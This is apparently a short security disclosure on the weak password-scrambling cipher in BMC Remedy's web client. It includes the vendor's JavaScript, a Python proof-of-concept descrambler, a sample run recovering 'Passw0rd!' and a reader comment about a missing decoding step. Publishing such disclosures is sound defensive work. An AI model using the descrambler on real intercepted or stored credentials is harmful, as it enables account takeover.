This is a very weak encryption cipher and easily decoded, so provides no real protection for your passwords. Ensure your web application is only served over HTTPS to protect your password and do not rely on this functionality. The following proof of concept reverses the cipher:// Scrambles passwords using simple cipher algorithm function getScrambledPassword(pwd) { var cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm']; var result=""; if (pwd == null) pwd = ""; pwd = encodeURIComponent(pwd); //alert("encoded password: " + pwd); for(var i=0;i<pwd.length;i++) { var cc = pwd.charCodeAt(i); result += cipher[Math.floor(cc/16)] + cipher[cc%16]; } //alert("scrambled password: " + result); return result; }
password.py
- #!/usr/bin/python
- from array import *
- import sys
- if len(sys.argv) != 2:
- print "# BMC Remedy Password Descrambler"
- print "# Author: Meatballs"
- print "# Usage: ./password.py ciphertext"
- else:
- cipherText = sys.argv[1]
- print "CipherText: " + cipherText
- cipher = array('c', 'kszhxbpjvcgfqntm')
- plainText = "PlainText: "
- i = 0
- while i < len(cipherText):
- x = cipher.index(cipherText[i]) * 16
- i += 1
- y = cipher.index(cipherText[i])
- z = x + y
- plainText += chr(z)
- i += 1
- print plainText
root@bt:/root/# ./password.py bkpsjhjhjjhkjzpxzs
CipherText: bkpsjhjhjjhkjzpxzs
PlainText: Passw0rd!
Read more:
http://myitpath.blogspot.co.uk/2010/09/reversing-remedy-passwords.html
It misses reversing the encodeURIComponent... (urllib.unquote seems suitable...)
ReplyDeleteBut its a start...